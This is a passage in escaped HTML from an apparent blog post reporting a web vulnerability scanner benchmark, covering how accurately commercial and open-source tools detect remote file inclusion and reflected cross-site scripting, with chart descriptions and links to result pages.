 &lt;v:imagedata src=&quot;file:///C:\Users\SHAY~1.CHE\AppData\Local\Temp\msohtmlclip1\01\clip_image044.png&quot;
  o:title=&quot;&quot;/&gt;
&lt;/v:shape&gt;&lt;![endif]--&gt;&lt;!--[if !vml]--&gt;&lt;!--[endif]--&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;b style=&quot;font-family: &#39;Times New Roman&#39;, serif;&quot;&gt;&lt;u&gt;&lt;span style=&quot;font-size: x-large;&quot;&gt;13. Test VI - (XSS via) RFI Detection&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &#39;Times New Roman&#39;, serif; font-size: 12pt;&quot;&gt;The sixth assessment criterion was again, identical
to the 2012 benchmark - the detection accuracy of &lt;/span&gt;&lt;b style=&quot;font-family: &#39;Times New Roman&#39;, serif; font-size: 12pt;&quot;&gt;Remote File Inclusion&lt;/b&gt;&lt;span style=&quot;font-family: &#39;Times New Roman&#39;, serif; font-size: 12pt;&quot;&gt;
(or more accurately, vectors of RFI that can result in XSS or Phishing - and
currently, not necessarily in server code execution), an assessment suite
implemented in WAVSEP v1.2, which was tested in the 2012 benchmark for the
first time, with &lt;/span&gt;&lt;b style=&quot;font-family: &#39;Times New Roman&#39;, serif; font-size: 12pt;&quot;&gt;interesting&lt;/b&gt;&lt;span style=&quot;font-family: &#39;Times New Roman&#39;, serif; font-size: 12pt;&quot;&gt; &lt;/span&gt;&lt;b style=&quot;font-family: &#39;Times New Roman&#39;, serif; font-size: 12pt;&quot;&gt;results&lt;/b&gt;&lt;span style=&quot;font-family: &#39;Times New Roman&#39;, serif; font-size: 12pt;&quot;&gt; &lt;/span&gt;&lt;b style=&quot;font-family: &#39;Times New Roman&#39;, serif; font-size: 12pt;&quot;&gt;indeed&lt;/b&gt;&lt;span style=&quot;font-family: &#39;Times New Roman&#39;, serif; font-size: 12pt;&quot;&gt;.&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;A reminder - although in the 2012 benchmark several products
identified the vulnerable test cases properly, some products &lt;b&gt;with RFI
detection features&lt;/b&gt; ignored it completely.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Obviously, 1.5 years after the 2012 publication, that&#39;s no
longer the case for the vast majority of vendors; the detection accuracy and
support for (XSS via) RFI was &lt;b&gt;dramatically improved&lt;/b&gt; in many tools, and
we – the users – can reap the rewards in penetration tests. &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;In order to assess the detection accuracy of different
remote file inclusion exposures, I used a total of &lt;b&gt;108&lt;/b&gt; (xss via) remote
file inclusion&lt;b&gt; &lt;/b&gt;test cases, and as always, a bunch of false positive
cases that represent common scenarios.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;The comparison of the scanners&#39; (xss via) remote file
inclusion detection accuracy is documented in detail in the following section
of sectoolmarket:&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;a href=&quot;http://sectoolmarket.com/remote-file-inclusion-detection-accuracy-unified-list.html&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;http://sectoolmarket.com/remote-file-inclusion-detection-accuracy-unified-list.html&lt;/span&gt;&lt;/a&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt; &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Result Chart Glossary&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Note that the&amp;nbsp;&lt;b&gt;&lt;span style=&quot;color: #38761d;&quot;&gt;GREEN&lt;/span&gt;&lt;span style=&quot;color: #0070c0;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/b&gt;bar represents the vulnerable test case
detection accuracy, while the&amp;nbsp;&lt;b&gt;&lt;span style=&quot;color: red;&quot;&gt;RED&lt;/span&gt;&amp;nbsp;&lt;/b&gt;bar
represents false positive&amp;nbsp;&lt;u&gt;categories&lt;/u&gt;&amp;nbsp;detected by the tool
(which may result in more instances then what the bar actually presents, when
compared to the detection accuracy bar).&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;The (XSS via) RFI Detection Accuracy of Commercial/SAAS Scanners&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; text-align: center; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;; mso-no-proof: yes;&quot;&gt;&lt;!--[if gte vml 1]&gt;&lt;v:shape id=&quot;Picture_x0020_32&quot;
 o:spid=&quot;_x0000_i1043&quot; type=&quot;#_x0000_t75&quot; style=&#39;width:414.75pt;height:203.25pt;
 visibility:visible;mso-wrap-style:square&#39;&gt;
 &lt;v:imagedata src=&quot;file:///C:\Users\SHAY~1.CHE\AppData\Local\Temp\msohtmlclip1\01\clip_image046.png&quot;
  o:title=&quot;&quot;/&gt;
&lt;/v:shape&gt;&lt;![endif]--&gt;&lt;!--[if !vml]--&gt;&lt;!--[endif]--&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiwYxq5lYXT3P8-8oo8GJ82oOPUsDz78MdLEN_VlmWeWXBkvcW9vorqOC-gQV7oxZU9Msk6414tED6frgVB0fQ9g4JOloVLF31pFFhUVyXPg7bSAEVITxIEc48YJOEwr1pdLByo8Jc3uz8/s1600/%252816%2529+Test+6-+Commercial+AND+SAAS+-+RFI.png&quot; imageanchor=&quot;1&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiwYxq5lYXT3P8-8oo8GJ82oOPUsDz78MdLEN_VlmWeWXBkvcW9vorqOC-gQV7oxZU9Msk6414tED6frgVB0fQ9g4JOloVLF31pFFhUVyXPg7bSAEVITxIEc48YJOEwr1pdLByo8Jc3uz8/s1600/%252816%2529+Test+6-+Commercial+AND+SAAS+-+RFI.png&quot; height=&quot;312&quot; width=&quot;640&quot; /&gt;&lt;span style=&quot;font-family: &#39;Times New Roman&#39;, serif; font-size: 12pt;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;The (XSS via) RFI Detection Accuracy of Opensource/Free
Scanners&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; text-align: center; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;; mso-no-proof: yes;&quot;&gt;&lt;!--[if gte vml 1]&gt;&lt;v:shape id=&quot;Picture_x0020_33&quot;
 o:spid=&quot;_x0000_i1042&quot; type=&quot;#_x0000_t75&quot; style=&#39;width:414.75pt;height:129.75pt;
 visibility:visible;mso-wrap-style:square&#39;&gt;
 &lt;v:imagedata src=&quot;file:///C:\Users\SHAY~1.CHE\AppData\Local\Temp\msohtmlclip1\01\clip_image048.png&quot;
  o:title=&quot;&quot;/&gt;
&lt;/v:shape&gt;&lt;![endif]--&gt;&lt;!--[if !vml]--&gt;&lt;!--[endif]--&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjvTezss6ZQcPUjivK5k1ZuJv61d71K5cst3XZO88FXJW8QpJTJkBliS3_xXxYIxjJp27JbcpQ8Lemz6e8jz_iNiu_VCM7YIm2HJ5PWAGEPhHLCV7KrnUrLA5U3IjJFkN4gKcgi37f110w/s1600/%252817%2529+Test+6-+Opensource+-+RFI.png&quot; imageanchor=&quot;1&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjvTezss6ZQcPUjivK5k1ZuJv61d71K5cst3XZO88FXJW8QpJTJkBliS3_xXxYIxjJp27JbcpQ8Lemz6e8jz_iNiu_VCM7YIm2HJ5PWAGEPhHLCV7KrnUrLA5U3IjJFkN4gKcgi37f110w/s1600/%252817%2529+Test+6-+Opensource+-+RFI.png&quot; height=&quot;200&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;The (XSS via) RFI Detection Accuracy of Scanners -Unified
List&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; text-align: center; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;; mso-no-proof: yes;&quot;&gt;&lt;!--[if gte vml 1]&gt;&lt;v:shape id=&quot;Picture_x0020_34&quot;
 o:spid=&quot;_x0000_i1041&quot; type=&quot;#_x0000_t75&quot; style=&#39;width:414.75pt;height:306pt;
 visibility:visible;mso-wrap-style:square&#39;&gt;
 &lt;v:imagedata src=&quot;file:///C:\Users\SHAY~1.CHE\AppData\Local\Temp\msohtmlclip1\01\clip_image050.png&quot;
  o:title=&quot;&quot;/&gt;
&lt;/v:shape&gt;&lt;![endif]--&gt;&lt;!--[if !vml]--&gt;&lt;!--[endif]--&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjxF808trbm3IzWMcG5YlPYaPaeJrDHjGqrpWIUZOmX02z74TbWzv2JvYltOle_YfxLvh99AXANeYT8nrZzOeWKLHmuvtGZIY71JPwQ8aVladPqSV0hTHNzWODS3WoVS6TaVo_W1KBVIlc/s1600/%252818%2529+Test+6-+Unified+-+RFI.png&quot; imageanchor=&quot;1&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjxF808trbm3IzWMcG5YlPYaPaeJrDHjGqrpWIUZOmX02z74TbWzv2JvYltOle_YfxLvh99AXANeYT8nrZzOeWKLHmuvtGZIY71JPwQ8aVladPqSV0hTHNzWODS3WoVS6TaVo_W1KBVIlc/s1600/%252818%2529+Test+6-+Unified+-+RFI.png&quot; height=&quot;472&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;b style=&quot;font-family: &#39;Times New Roman&#39;, serif;&quot;&gt;&lt;u&gt;&lt;span style=&quot;font-size: x-large;&quot;&gt;14. Test VII - Reflected XSS Detection&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;The seventh assessment criterion has been a part of the
yearly WAVSEP assessment for four years now (!), and the results of the various
vendors that maintain their tools emphasize that well. &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;As the title suggests, this section deals with the detection
accuracy of &lt;b&gt;Reflected Cross Site Scripting&lt;/b&gt;, a &lt;b&gt;&lt;u&gt;very&lt;/u&gt;&lt;/b&gt; common
exposure which is the 2nd most commonly implemented feature in web application vulnerability
scanners.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;The assessment was performed using &lt;b&gt;66&lt;/b&gt; different
Reflected XSS test cases and a bunch of false positive test cases, and while &lt;b&gt;ignoring&lt;/b&gt;
the results of the various experimental RXSS test cases included in WAVSEP 1.5
(although the &quot;experimental&quot; results are included in most of the
individual tools scan logs in sectoolmarket).&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;There&#39;s not much to say in this section that wasn&#39;t already
said in previous articles and benchmarks, except to present the current (and
generally &lt;b&gt;IMPRESSIVE&lt;/b&gt;) results of the various maintained products /
projects. &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;The comparison of the scanners&#39; reflected cross site
scripting detection accuracy is documented in detail in the following section
of sectoolmarket:&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;a href=&quot;http://sectoolmarket.com/reflected-cross-site-scripting-detection-accuracy-unified-list.html&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;http://sectoolmarket.com/reflected-cross-site-scripting-detection-accuracy-unified-list.html&lt;/span&gt;&lt;/a&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Note&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Bugs in certain products seemed to affect their detection
accuracy for Reflected XSS, since in the past, these products obtained higher
results (notably &lt;b&gt;arachni&lt;/b&gt;/&lt;b&gt;W3AF&lt;/b&gt;).&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Result Chart Glossary&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Note that the &lt;b&gt;&lt;span style=&quot;color: #38761d;&quot;&gt;GREEN&lt;/span&gt;&lt;span style=&quot;color: #0070c0;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/b&gt;bar represents the vulnerable test case
detection accuracy, while the &lt;b&gt;&lt;span style=&quot;color: red;&quot;&gt;RED&lt;/span&gt; &lt;/b&gt;bar
represents false positive &lt;u&gt;categories&lt;/u&gt; detected by the tool (which may
result in more instances then what the bar actually presents, when compared to
the detection accuracy bar).&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;br /&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12pt;&quot;&gt;&lt;b&gt;Note:&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
